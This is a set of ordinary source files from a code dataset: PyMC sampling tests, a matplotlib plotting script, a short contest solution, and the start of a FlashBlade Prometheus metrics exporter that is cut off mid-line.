1)\n with mock.patch(\"numpy.random.Generator.uniform\", side_effect=[-1, -1, -1, 1, -1]):\n start = pm.sampling._init_jitter(\n model=m,\n initvals=None,\n seeds=[1],\n jitter=True,\n jitter_max_retries=jitter_max_retries,\n )\n m.check_start_vals(start)\n\n\n@pytest.fixture(scope=\"class\")\ndef point_list_arg_bug_fixture() -> Tuple[pm.Model, pm.backends.base.MultiTrace]:\n with pm.Model() as pmodel:\n n = pm.Normal(\"n\")\n trace = pm.sample(return_inferencedata=False)\n\n with pmodel:\n d = pm.Deterministic(\"d\", n * 4)\n return pmodel, trace\n\n\nclass TestSamplePriorPredictive(SeededTest):\n def test_ignores_observed(self):\n observed = np.random.normal(10, 1, size=200)\n with pm.Model():\n # Use a prior that's way off to show we're ignoring the observed variables\n observed_data = pm.MutableData(\"observed_data\", observed)\n mu = pm.Normal(\"mu\", mu=-100, sigma=1)\n positive_mu = pm.Deterministic(\"positive_mu\", np.abs(mu))\n z = -1 - positive_mu\n pm.Normal(\"x_obs\", mu=z, sigma=1, observed=observed_data)\n prior = pm.sample_prior_predictive(return_inferencedata=False)\n\n assert \"observed_data\" not in prior\n assert (prior[\"mu\"] < -90).all()\n assert (prior[\"positive_mu\"] > 90).all()\n assert (prior[\"x_obs\"] < -90).all()\n assert prior[\"x_obs\"].shape == (500, 200)\n npt.assert_array_almost_equal(prior[\"positive_mu\"], np.abs(prior[\"mu\"]), decimal=4)\n\n def test_respects_shape(self):\n for shape in (2, (2,), (10, 2), (10, 10)):\n with pm.Model():\n mu = pm.Gamma(\"mu\", 3, 1, size=1)\n goals = pm.Poisson(\"goals\", mu, size=shape)\n trace1 = pm.sample_prior_predictive(\n 10, return_inferencedata=False, var_names=[\"mu\", \"mu\", \"goals\"]\n )\n trace2 = pm.sample_prior_predictive(\n 10, return_inferencedata=False, var_names=[\"mu\", \"goals\"]\n )\n if shape == 2: # want to test shape as an int\n shape = (2,)\n assert trace1[\"goals\"].shape == (10,) + shape\n assert trace2[\"goals\"].shape == (10,) + shape\n\n def test_multivariate(self):\n with 
pm.Model():\n m = pm.Multinomial(\"m\", n=5, p=np.array([0.25, 0.25, 0.25, 0.25]))\n trace = pm.sample_prior_predictive(10)\n\n assert trace.prior[\"m\"].shape == (1, 10, 4)\n\n def test_multivariate2(self):\n # Added test for issue #3271\n mn_data = np.random.multinomial(n=100, pvals=[1 / 6.0] * 6, size=10)\n with pm.Model() as dm_model:\n probs = pm.Dirichlet(\"probs\", a=np.ones(6))\n obs = pm.Multinomial(\"obs\", n=100, p=probs, observed=mn_data)\n with aesara.config.change_flags(mode=fast_unstable_sampling_mode):\n burned_trace = pm.sample(\n tune=10,\n draws=20,\n chains=1,\n return_inferencedata=False,\n compute_convergence_checks=False,\n )\n sim_priors = pm.sample_prior_predictive(\n return_inferencedata=False, samples=20, model=dm_model\n )\n sim_ppc = pm.sample_posterior_predictive(\n burned_trace, return_inferencedata=False, samples=20, model=dm_model\n )\n assert sim_priors[\"probs\"].shape == (20, 6)\n assert sim_priors[\"obs\"].shape == (20,) + mn_data.shape\n assert sim_ppc[\"obs\"].shape == (20,) + mn_data.shape\n\n def test_layers(self):\n with pm.Model() as model:\n a = pm.Uniform(\"a\", lower=0, upper=1, size=10)\n b = pm.Binomial(\"b\", n=1, p=a, size=10)\n\n b_sampler = compile_pymc([], b, mode=\"FAST_RUN\", random_seed=232093)\n avg = np.stack([b_sampler() for i in range(10000)]).mean(0)\n npt.assert_array_almost_equal(avg, 0.5 * np.ones((10,)), decimal=2)\n\n def test_transformed(self):\n n = 18\n at_bats = 45 * np.ones(n, dtype=int)\n hits = np.random.randint(1, 40, size=n, dtype=int)\n draws = 50\n\n with pm.Model() as model:\n phi = pm.Beta(\"phi\", alpha=1.0, beta=1.0)\n\n kappa_log = pm.Exponential(\"logkappa\", lam=5.0)\n kappa = pm.Deterministic(\"kappa\", at.exp(kappa_log))\n\n thetas = pm.Beta(\"thetas\", alpha=phi * kappa, beta=(1.0 - phi) * kappa, size=n)\n\n y = pm.Binomial(\"y\", n=at_bats, p=thetas, observed=hits)\n gen = pm.sample_prior_predictive(draws)\n\n assert gen.prior[\"phi\"].shape == (1, draws)\n assert gen.prior_predictive[\"y\"].shape == (1, draws, n)\n assert \"thetas\" in gen.prior.data_vars\n\n def test_shared(self):\n n1 = 10\n obs = shared(np.random.rand(n1) < 0.5)\n draws = 50\n\n with pm.Model() as m:\n p = pm.Beta(\"p\", 1.0, 1.0)\n y = pm.Bernoulli(\"y\", p, observed=obs)\n o = pm.Deterministic(\"o\", obs)\n gen1 = pm.sample_prior_predictive(draws)\n\n assert gen1.prior_predictive[\"y\"].shape == (1, draws, n1)\n assert gen1.prior[\"o\"].shape == (1, draws, n1)\n\n n2 = 20\n obs.set_value(np.random.rand(n2) < 0.5)\n with m:\n gen2 = pm.sample_prior_predictive(draws)\n\n assert gen2.prior_predictive[\"y\"].shape == (1, draws, n2)\n assert gen2.prior[\"o\"].shape == (1, draws, n2)\n\n def test_density_dist(self):\n obs = np.random.normal(-1, 0.1, size=10)\n with pm.Model():\n mu = pm.Normal(\"mu\", 0, 1)\n sigma = pm.HalfNormal(\"sigma\", 1e-6)\n a = pm.DensityDist(\n \"a\",\n mu,\n sigma,\n random=lambda mu, sigma, rng=None, size=None: rng.normal(\n loc=mu, scale=sigma, size=size\n ),\n observed=obs,\n )\n prior = pm.sample_prior_predictive(return_inferencedata=False)\n\n npt.assert_almost_equal((prior[\"a\"] - prior[\"mu\"][..., None]).mean(), 0, decimal=3)\n\n def test_shape_edgecase(self):\n with pm.Model():\n mu = pm.Normal(\"mu\", size=5)\n sigma = pm.Uniform(\"sigma\", lower=2, upper=3)\n x = pm.Normal(\"x\", mu=mu, sigma=sigma, size=5)\n prior = pm.sample_prior_predictive(10)\n assert prior.prior[\"mu\"].shape == (1, 10, 5)\n\n def test_zeroinflatedpoisson(self):\n with pm.Model():\n mu = pm.Beta(\"mu\", alpha=1, beta=1)\n 
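# in PyMC's parameterization, psi is the expected proportion of draws that come from the Poisson component\n            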
psi = pm.HalfNormal(\"psi\", sigma=1)\n pm.ZeroInflatedPoisson(\"suppliers\", psi=psi, mu=mu, size=20)\n gen_data = pm.sample_prior_predictive(samples=5000)\n assert gen_data.prior[\"mu\"].shape == (1, 5000)\n assert gen_data.prior[\"psi\"].shape == (1, 5000)\n assert gen_data.prior[\"suppliers\"].shape == (1, 5000, 20)\n\n def test_potentials_warning(self):\n warning_msg = \"The effect of Potentials on other parameters is ignored during\"\n with pm.Model() as m:\n a = pm.Normal(\"a\", 0, 1)\n p = pm.Potential(\"p\", a + 1)\n\n with m:\n with pytest.warns(UserWarning, match=warning_msg):\n pm.sample_prior_predictive(samples=5)\n\n def test_transformed_vars(self):\n # Test that prior predictive returns transformation of RVs when these are\n # passed explicitly in `var_names`\n\n def ub_interval_forward(x, ub):\n # Interval transform assuming lower bound is zero\n return np.log(x - 0) - np.log(ub - x)\n\n with pm.Model() as model:\n ub = pm.HalfNormal(\"ub\", 10)\n x = pm.Uniform(\"x\", 0, ub)\n\n prior = pm.sample_prior_predictive(\n var_names=[\"ub\", \"ub_log__\", \"x\", \"x_interval__\"],\n samples=10,\n random_seed=123,\n )\n\n # Check values are correct\n assert np.allclose(prior.prior[\"ub_log__\"].data, np.log(prior.prior[\"ub\"].data))\n assert np.allclose(\n prior.prior[\"x_interval__\"].data,\n ub_interval_forward(prior.prior[\"x\"].data, prior.prior[\"ub\"].data),\n )\n\n # Check that it works when the original RVs are not mentioned in var_names\n with pm.Model() as model_transformed_only:\n ub = pm.HalfNormal(\"ub\", 10)\n x = pm.Uniform(\"x\", 0, ub)\n\n prior_transformed_only = pm.sample_prior_predictive(\n var_names=[\"ub_log__\", \"x_interval__\"],\n samples=10,\n random_seed=123,\n )\n assert (\n \"ub\" not in prior_transformed_only.prior.data_vars\n and \"x\" not in prior_transformed_only.prior.data_vars\n )\n assert np.allclose(\n prior.prior[\"ub_log__\"].data, prior_transformed_only.prior[\"ub_log__\"].data\n )\n assert np.allclose(\n prior.prior[\"x_interval__\"], prior_transformed_only.prior[\"x_interval__\"].data\n )\n\n def test_issue_4490(self):\n # Test that samples do not depend on var_name order or, more fundamentally,\n # that they do not depend on the set order used inside `sample_prior_predictive`\n seed = 4490\n with pm.Model() as m1:\n a = pm.Normal(\"a\")\n b = pm.Normal(\"b\")\n c = pm.Normal(\"c\")\n d = pm.Normal(\"d\")\n prior1 = pm.sample_prior_predictive(\n samples=1, var_names=[\"a\", \"b\", \"c\", \"d\"], random_seed=seed\n )\n\n with pm.Model() as m2:\n a = pm.Normal(\"a\")\n b = pm.Normal(\"b\")\n c = pm.Normal(\"c\")\n d = pm.Normal(\"d\")\n prior2 = pm.sample_prior_predictive(\n samples=1, var_names=[\"b\", \"a\", \"d\", \"c\"], random_seed=seed\n )\n\n assert prior1.prior[\"a\"] == prior2.prior[\"a\"]\n assert prior1.prior[\"b\"] == prior2.prior[\"b\"]\n assert prior1.prior[\"c\"] == prior2.prior[\"c\"]\n assert prior1.prior[\"d\"] == prior2.prior[\"d\"]\n\n def test_aesara_function_kwargs(self):\n sharedvar = aesara.shared(0)\n with pm.Model() as m:\n x = pm.DiracDelta(\"x\", 0)\n y = pm.Deterministic(\"y\", x + sharedvar)\n\n prior = pm.sample_prior_predictive(\n samples=5,\n return_inferencedata=False,\n compile_kwargs=dict(\n mode=Mode(\"py\"),\n updates={sharedvar: sharedvar + 1},\n ),\n )\n\n assert np.all(prior[\"y\"] == np.arange(5))\n\n\nclass TestSamplePosteriorPredictive:\n def test_point_list_arg_bug_spp(self, point_list_arg_bug_fixture):\n pmodel, trace = point_list_arg_bug_fixture\n with pmodel:\n pp = 
pm.sample_posterior_predictive(\n [trace[15]], return_inferencedata=False, var_names=[\"d\"]\n )\n\n def test_sample_from_xarray_prior(self, point_list_arg_bug_fixture):\n pmodel, trace = point_list_arg_bug_fixture\n\n with pmodel:\n prior = pm.sample_prior_predictive(\n samples=20,\n return_inferencedata=False,\n )\n idat = pm.to_inference_data(trace, prior=prior)\n\n with pmodel:\n pp = pm.sample_posterior_predictive(\n idat.prior, return_inferencedata=False, var_names=[\"d\"]\n )\n\n def test_sample_from_xarray_posterior(self, point_list_arg_bug_fixture):\n pmodel, trace = point_list_arg_bug_fixture\n with pmodel:\n idat = pm.to_inference_data(trace)\n pp = pm.sample_posterior_predictive(idat.posterior, var_names=[\"d\"])\n\n def test_aesara_function_kwargs(self):\n sharedvar = aesara.shared(0)\n with pm.Model() as m:\n x = pm.DiracDelta(\"x\", 0.0)\n y = pm.Deterministic(\"y\", x + sharedvar)\n\n pp = pm.sample_posterior_predictive(\n trace=az_from_dict({\"x\": np.arange(5)}),\n var_names=[\"y\"],\n return_inferencedata=False,\n compile_kwargs=dict(\n mode=Mode(\"py\"),\n updates={sharedvar: sharedvar + 1},\n ),\n )\n\n assert np.all(pp[\"y\"] == np.arange(5) * 2)\n\n\nclass TestDraw(SeededTest):\n def test_univariate(self):\n with pm.Model():\n x = pm.Normal(\"x\")\n\n x_draws = pm.draw(x)\n assert x_draws.shape == ()\n\n (x_draws,) = pm.draw([x])\n assert x_draws.shape == ()\n\n x_draws = pm.draw(x, draws=10)\n assert x_draws.shape == (10,)\n\n (x_draws,) = pm.draw([x], draws=10)\n assert x_draws.shape == (10,)\n\n def test_multivariate(self):\n with pm.Model():\n mln = pm.Multinomial(\"mln\", n=5, p=np.array([0.25, 0.25, 0.25, 0.25]))\n\n mln_draws = pm.draw(mln, draws=1)\n assert mln_draws.shape == (4,)\n\n (mln_draws,) = pm.draw([mln], draws=1)\n assert mln_draws.shape == (4,)\n\n mln_draws = pm.draw(mln, draws=10)\n assert mln_draws.shape == (10, 4)\n\n (mln_draws,) = pm.draw([mln], draws=10)\n assert mln_draws.shape == (10, 4)\n\n def test_multiple_variables(self):\n with pm.Model():\n x = pm.Normal(\"x\")\n y = pm.Normal(\"y\", shape=10)\n z = pm.Uniform(\"z\", shape=5)\n w = pm.Dirichlet(\"w\", a=[1, 1, 1])\n\n num_draws = 100\n draws = pm.draw((x, y, z, w), draws=num_draws)\n assert draws[0].shape == (num_draws,)\n assert draws[1].shape == (num_draws, 10)\n assert draws[2].shape == (num_draws, 5)\n assert draws[3].shape == (num_draws, 3)\n\n def test_draw_different_samples(self):\n with pm.Model():\n x = pm.Normal(\"x\")\n\n x_draws_1 = pm.draw(x, 100)\n x_draws_2 = pm.draw(x, 100)\n assert not np.all(np.isclose(x_draws_1, x_draws_2))\n\n def test_draw_aesara_function_kwargs(self):\n sharedvar = aesara.shared(0)\n x = pm.DiracDelta.dist(0.0)\n y = x + sharedvar\n draws = pm.draw(\n y,\n draws=5,\n mode=Mode(\"py\"),\n updates={sharedvar: sharedvar + 1},\n )\n assert np.all(draws == np.arange(5))\n\n\ndef test_step_args():\n with pm.Model() as model:\n a = pm.Normal(\"a\")\n idata0 = pm.sample(target_accept=0.5, random_seed=1410)\n idata1 = pm.sample(nuts={\"target_accept\": 0.5}, random_seed=1410 * 2)\n idata2 = pm.sample(target_accept=0.5, nuts={\"max_treedepth\": 10}, random_seed=1410)\n\n with pytest.raises(ValueError, match=\"`target_accept` was defined twice.\"):\n pm.sample(target_accept=0.5, nuts={\"target_accept\": 0.95}, random_seed=1410)\n\n npt.assert_almost_equal(idata0.sample_stats.acceptance_rate.mean(), 0.5, decimal=1)\n npt.assert_almost_equal(idata1.sample_stats.acceptance_rate.mean(), 0.5, decimal=1)\n 
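# idata2 above combined a top-level target_accept with a separate nuts kwargs dict; both should apply\n    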
npt.assert_almost_equal(idata2.sample_stats.acceptance_rate.mean(), 0.5, decimal=1)\n\n with pm.Model() as model:\n a = pm.Normal(\"a\")\n b = pm.Poisson(\"b\", 1)\n idata0 = pm.sample(target_accept=0.5, random_seed=1418)\n idata1 = pm.sample(\n nuts={\"target_accept\": 0.5}, metropolis={\"scaling\": 0}, random_seed=1418 * 2\n )\n\n npt.assert_almost_equal(idata0.sample_stats.acceptance_rate.mean(), 0.5, decimal=1)\n npt.assert_almost_equal(idata1.sample_stats.acceptance_rate.mean(), 0.5, decimal=1)\n npt.assert_allclose(idata1.sample_stats.scaling, 0)\n\n\ndef test_init_nuts(caplog):\n with pm.Model() as model:\n a = pm.Normal(\"a\")\n pm.sample(10, tune=10)\n assert \"Initializing NUTS\" in caplog.text\n\n\ndef test_no_init_nuts_step(caplog):\n with pm.Model() as model:\n a = pm.Normal(\"a\")\n pm.sample(10, tune=10, step=pm.NUTS([a]))\n assert \"Initializing NUTS\" not in caplog.text\n\n\ndef test_no_init_nuts_compound(caplog):\n with pm.Model() as model:\n a = pm.Normal(\"a\")\n b = pm.Poisson(\"b\", 1)\n pm.sample(10, tune=10)\n assert \"Initializing NUTS\" not in caplog.text\n\n\nclass TestCompileForwardSampler:\n @staticmethod\n def get_function_roots(function):\n return [\n var\n for var in aesara.graph.basic.graph_inputs(function.maker.fgraph.outputs)\n if var.name\n ]\n\n @staticmethod\n def get_function_inputs(function):\n return {i for i in function.maker.fgraph.inputs if not isinstance(i, SharedVariable)}\n\n def test_linear_model(self):\n with pm.Model() as model:\n x = pm.MutableData(\"x\", np.linspace(0, 1, 10))\n y = pm.MutableData(\"y\", np.ones(10))\n\n alpha = pm.Normal(\"alpha\", 0, 0.1)\n beta = pm.Normal(\"beta\", 0, 0.1)\n mu = pm.Deterministic(\"mu\", alpha + beta * x)\n sigma = pm.HalfNormal(\"sigma\", 0.1)\n obs = pm.Normal(\"obs\", mu, sigma, observed=y)\n\n f = compile_forward_sampling_function(\n [obs],\n vars_in_trace=[alpha, beta, sigma, mu],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"alpha\", \"beta\", \"sigma\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"x\", \"alpha\", \"beta\", \"sigma\"}\n\n with pm.Model() as model:\n x = pm.ConstantData(\"x\", np.linspace(0, 1, 10))\n y = pm.MutableData(\"y\", np.ones(10))\n\n alpha = pm.Normal(\"alpha\", 0, 0.1)\n beta = pm.Normal(\"beta\", 0, 0.1)\n mu = pm.Deterministic(\"mu\", alpha + beta * x)\n sigma = pm.HalfNormal(\"sigma\", 0.1)\n obs = pm.Normal(\"obs\", mu, sigma, observed=y)\n\n f = compile_forward_sampling_function(\n [obs],\n vars_in_trace=[alpha, beta, sigma, mu],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"alpha\", \"beta\", \"sigma\", \"mu\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"mu\", \"sigma\"}\n\n def test_nested_observed_model(self):\n with pm.Model() as model:\n p = pm.ConstantData(\"p\", np.array([0.25, 0.5, 0.25]))\n x = pm.MutableData(\"x\", np.zeros(10))\n y = pm.MutableData(\"y\", np.ones(10))\n\n category = pm.Categorical(\"category\", p, observed=x)\n beta = pm.Normal(\"beta\", 0, 0.1, size=p.shape)\n mu = pm.Deterministic(\"mu\", beta[category])\n sigma = pm.HalfNormal(\"sigma\", 0.1)\n pm.Normal(\"obs\", mu, sigma, observed=y)\n\n f = compile_forward_sampling_function(\n outputs=model.observed_RVs,\n vars_in_trace=[beta, mu, sigma],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"beta\", \"sigma\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"x\", \"p\", \"beta\", \"sigma\"}\n\n f = 
compile_forward_sampling_function(\n outputs=model.observed_RVs,\n vars_in_trace=[beta, mu, sigma],\n basic_rvs=model.basic_RVs,\n givens_dict={category: np.zeros(10, dtype=category.dtype)},\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"beta\", \"sigma\"}\n assert {i.name for i in self.get_function_roots(f)} == {\n \"x\",\n \"p\",\n \"category\",\n \"beta\",\n \"sigma\",\n }\n\n def test_volatile_parameters(self):\n with pm.Model() as model:\n y = pm.MutableData(\"y\", np.ones(10))\n mu = pm.Normal(\"mu\", 0, 1)\n nested_mu = pm.Normal(\"nested_mu\", mu, 1, size=10)\n sigma = pm.HalfNormal(\"sigma\", 1)\n pm.Normal(\"obs\", nested_mu, sigma, observed=y)\n\n f = compile_forward_sampling_function(\n outputs=model.observed_RVs,\n vars_in_trace=[nested_mu, sigma], # mu isn't in the trace and will be deemed volatile\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"sigma\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"sigma\"}\n\n f = compile_forward_sampling_function(\n outputs=model.observed_RVs,\n vars_in_trace=[mu, nested_mu, sigma],\n basic_rvs=model.basic_RVs,\n givens_dict={\n mu: np.array(1.0)\n }, # mu will be considered volatile because it's in givens\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"sigma\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"mu\", \"sigma\"}\n\n def test_distributions_op_from_graph(self):\n with pm.Model() as model:\n w = pm.Dirichlet(\"w\", a=np.ones(3), size=(5, 3))\n\n mu = pm.Normal(\"mu\", mu=np.arange(3), sigma=1)\n\n components = pm.Normal.dist(mu=mu, sigma=1, size=w.shape)\n mix_mu = pm.Mixture(\"mix_mu\", w=w, comp_dists=components)\n obs = pm.Normal(\"obs\", mix_mu, 1, observed=np.ones((5, 3)))\n\n f = compile_forward_sampling_function(\n outputs=[obs],\n vars_in_trace=[mix_mu, mu, w],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"w\", \"mu\", \"mix_mu\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"mix_mu\"}\n\n f = compile_forward_sampling_function(\n outputs=[obs],\n vars_in_trace=[mu, w],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"w\", \"mu\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"w\", \"mu\"}\n\n f = compile_forward_sampling_function(\n outputs=[obs],\n vars_in_trace=[mix_mu, mu],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"mu\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"mu\"}\n\n def test_distributions_no_op_from_graph(self):\n with pm.Model() as model:\n latent_mu = pm.Normal(\"latent_mu\", mu=np.arange(3), sigma=1)\n mu = pm.Censored(\"mu\", pm.Normal.dist(mu=latent_mu, sigma=1), lower=-1, upper=1)\n obs = pm.Normal(\"obs\", mu, 1, observed=np.ones((10, 3)))\n\n f = compile_forward_sampling_function(\n outputs=[obs],\n vars_in_trace=[latent_mu, mu],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"latent_mu\", \"mu\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"mu\"}\n\n f = compile_forward_sampling_function(\n outputs=[obs],\n vars_in_trace=[mu],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == set()\n assert {i.name for i in self.get_function_roots(f)} == set()\n\n def test_lkj_cholesky_cov(self):\n with pm.Model() as model:\n mu = np.zeros(3)\n sd_dist = pm.Exponential.dist(1.0, size=3)\n chol, corr, stds = pm.LKJCholeskyCov( # 
pylint: disable=unpacking-non-sequence\n \"chol_packed\", n=3, eta=2, sd_dist=sd_dist, compute_corr=True\n )\n chol_packed = model[\"chol_packed\"]\n chol = pm.Deterministic(\"chol\", chol)\n obs = pm.MvNormal(\"obs\", mu=mu, chol=chol, observed=np.zeros(3))\n\n f = compile_forward_sampling_function(\n outputs=[obs],\n vars_in_trace=[chol_packed, chol],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"chol_packed\", \"chol\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"chol\"}\n\n f = compile_forward_sampling_function(\n outputs=[obs],\n vars_in_trace=[chol_packed],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == {\"chol_packed\"}\n assert {i.name for i in self.get_function_roots(f)} == {\"chol_packed\"}\n\n f = compile_forward_sampling_function(\n outputs=[obs],\n vars_in_trace=[chol],\n basic_rvs=model.basic_RVs,\n )\n assert {i.name for i in self.get_function_inputs(f)} == set()\n assert {i.name for i in self.get_function_roots(f)} == set()\n\n\ndef test_get_seeds_per_chain():\n ret = _get_seeds_per_chain(None, chains=1)\n assert len(ret) == 1 and isinstance(ret[0], int)\n\n ret = _get_seeds_per_chain(None, chains=2)\n assert len(ret) == 2 and isinstance(ret[0], int)\n\n ret = _get_seeds_per_chain(5, chains=1)\n assert ret == (5,)\n\n ret = _get_seeds_per_chain(5, chains=3)\n assert len(ret) == 3 and isinstance(ret[0], int) and not any(r == 5 for r in ret)\n\n rng = np.random.default_rng(123)\n expected_ret = rng.integers(2**30, dtype=np.int64, size=1)\n rng = np.random.default_rng(123)\n ret = _get_seeds_per_chain(rng, chains=1)\n assert ret == expected_ret\n\n rng = np.random.RandomState(456)\n expected_ret = rng.randint(2**30, dtype=np.int64, size=2)\n rng = np.random.RandomState(456)\n ret = _get_seeds_per_chain(rng, chains=2)\n assert np.all(ret == expected_ret)\n\n for expected_ret in ([0, 1, 2], (0, 1, 2, 3), np.arange(5)):\n ret = _get_seeds_per_chain(expected_ret, chains=len(expected_ret))\n assert ret is expected_ret\n\n with pytest.raises(ValueError, match=\"does not match the number of chains\"):\n _get_seeds_per_chain(expected_ret, chains=len(expected_ret) + 1)\n\n with pytest.raises(ValueError, match=re.escape(\"The `seeds` must be array-like\")):\n _get_seeds_per_chain({1: 1, 2: 2}, 2)\n","sub_path":"pymc/tests/test_sampling.py","file_name":"test_sampling.py","file_ext":"py","file_size_in_byte":65879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"640917338","text":"import sys\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nif __name__ == \"__main__\":\n df = pd.read_csv('../../data/Lifetime.csv',names=['dCETime','iSttsP','iSttsD','iSttsX',\"dValTemp\",'Par0','ePar0','Par1','ePar1','Par2','ePar2'])\n plt.figure(num=None, figsize=(12, 6.5), dpi=300, facecolor='w', edgecolor='k')\n plt.rcParams['font.size'] = 20\n dfE = df[(df[\"iSttsD\"] > 5)]\n plt.errorbar(dfE['dValTemp'],dfE['Par2'],xerr=0.1,yerr=dfE['ePar2'],fmt='bo',ecolor='black',capsize=2)\n plt.title('$R_{BG}$ vs Temperature')\n plt.ylabel('$R_{BG}$[Counts/100msec]')\n plt.xlabel('Temperature[℃]')\n #plt.legend(loc='upper right') #upper or lower\n plt.tight_layout()\n plt.savefig(\"../figure/plotBGvsTemp.png\")\n #plt.show()\n","sub_path":"plot/plotBGvsTemp.py","file_name":"plotBGvsTemp.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} 
+{"seq_id":"652499824","text":"n=input(\"\")\r\nka=int(n)\r\nwhile ka>=1:\r\n ls2=[]\r\n inp=str(input(\"\"))\r\n spl=inp.split(\" \")\r\n n=int(spl[0])\r\n k=int(spl[1])\r\n inp2=str(input(\"\"))\r\n spl2=inp2.split()\r\n nmk=int(spl2[k-1])\r\n for i in spl2: \r\n ok=int(i)\r\n if ok>=nmk:\r\n ls2.append(i)\r\n print(len(ls2))\r\n ka-=1\r\n","sub_path":"Koduesi/Qualification.py","file_name":"Qualification.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"113703211","text":"import urllib3\nimport six\nfrom purity_fb import PurityFb, rest\n\n# import third party modules\nfrom prometheus_client.core import GaugeMetricFamily, InfoMetricFamily\n\n# disable ceritificate warnings\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n\nclass FlashbladeCollector():\n \"\"\"\n Instantiates the collector's methods and properties to retrieve status,\n space occupancy and performance metrics from Puretorage FlasBlade.\n Provides also a 'collect' method to allow Prometheus client registry\n to work properly.\n :param target: IP address or domain name of the target array's management\n interface.\n :type target: str\n :param api_token: API token of the user with which to log in.\n :type api_token: str\n \"\"\"\n def __init__(self, target, api_token, request = 'all'):\n # self.fb = PurityFb(endpoint, conn_timeo=ctimeo, read_timeo=rtimeo, retries=retries)\n self.fb = PurityFb(host=target)\n self.fb.disable_verify_ssl()\n self.fb._api_client.user_agent = 'Purity_FB_Prometheus_exporter/1.0'\n self.fb.request_timeout = urllib3.Timeout(connect=2.0, read=60.0)\n self.fb.login(api_token)\n self.request = request\n self.filesystems = self.fb.file_systems.list_file_systems()\n self.buckets = self.fb.buckets.list_buckets()\n\n\n def __del__(self):\n if self.fb is not None:\n self.fb.logout()\n\n def array_info(self):\n \"\"\"Assemble a simple information metric defining the scraped system.\"\"\"\n data = self.fb.arrays.list_arrays().items[0]\n\n yield InfoMetricFamily(\n 'purefb',\n 'FlashBlade system information',\n value={\n 'array_name': data.name,\n 'system_id': data.id,\n 'os': data.os,\n 'version': data.version\n })\n\n def array_hw(self):\n \"\"\"\n Create a metric of gauge type for components status,\n with the hardware component name as label.\n Metrics values can be iterated over.\n \"\"\"\n fb_hw = self.fb.hardware.list_hardware().items\n status = GaugeMetricFamily('purefb_hw_status',\n 'Hardware components status',\n labels=['hw_id'])\n for h in fb_hw:\n state = h.status\n name = h.name\n labels_v = [name]\n if state == 'unused' or state == 'not_installed':\n continue\n elif state == 'healthy':\n status.add_metric(labels_v, 1)\n else:\n status.add_metric(labels_v, 0)\n yield status\n\n def array_events(self):\n \"\"\"\n Create a metric of gauge type for the number of open alerts:\n critical, warning and info, with the severity as label.\n Metrics values can be iterated over.\n \"\"\"\n fb_events = self.fb.alerts.list_alerts(filter=\"state='open'\").items\n labels = ['severity']\n events = GaugeMetricFamily('purefb_open_events_total',\n 'FlashBlade number of open events',\n labels=labels)\n\n # Inrement each counter for each type of event\n c_crit, c_warn, c_info = 0, 0, 0\n for msg in fb_events:\n if msg.severity == 'critical':\n c_crit += 1\n if msg.severity == 'warning':\n c_warn += 1\n if msg.severity == 'info':\n c_info += 1\n events.add_metric(['critical'], c_crit)\n 
events.add_metric(['warning'], c_warn)\n events.add_metric(['info'], c_info)\n yield events\n\n\n def array_space(self):\n \"\"\"\n Create metrics of gauge type for array space indicators.\n Metrics values can be iterated over.\n \"\"\"\n fb_space = self.fb.arrays.list_arrays_space().items[0]\n data_reduction = GaugeMetricFamily('purefb_array_space_data_reduction',\n 'FlashBlade overall data reduction',\n labels=[])\n space = GaugeMetricFamily('purefb_array_space_bytes',\n 'FlashBlade total space capacity',\n labels=['dimension'])\n data_reduction.add_metric([], fb_space.space.data_reduction)\n space.add_metric(['capacity'], fb_space.capacity)\n space.add_metric(['total_physical'], fb_space.space.total_physical)\n space.add_metric(['snapshots'], fb_space.space.snapshots)\n yield data_reduction\n yield space\n\n\n def buckets_space(self):\n \"\"\"\n Create metrics of gauge type for buckets space indicators, with the\n account name and the bucket name as labels.\n Metrics values can be iterated over.\n \"\"\"\n datareduction = GaugeMetricFamily('purefb_buckets_data_reduction',\n 'FlashBlade buckets data reduction',\n labels=['account', 'name'])\n objcount = GaugeMetricFamily('purefb_buckets_object_count',\n 'FlashBlade buckets objects counter',\n labels=['account', 'name'])\n space = GaugeMetricFamily('purefb_buckets_space_bytes',\n 'FlashBlade buckets space',\n labels=['account', 'name', 'dimension'])\n for b in self.buckets.items:\n if b.space.data_reduction is None:\n b.space.data_reduction = 0\n datareduction.add_metric([b.account.name, b.name],\n b.space.data_reduction)\n objcount.add_metric([b.account.name, b.name], b.object_count)\n space.add_metric([b.account.name, b.name, 'snapshots'], b.space.snapshots)\n space.add_metric([b.account.name, b.name, 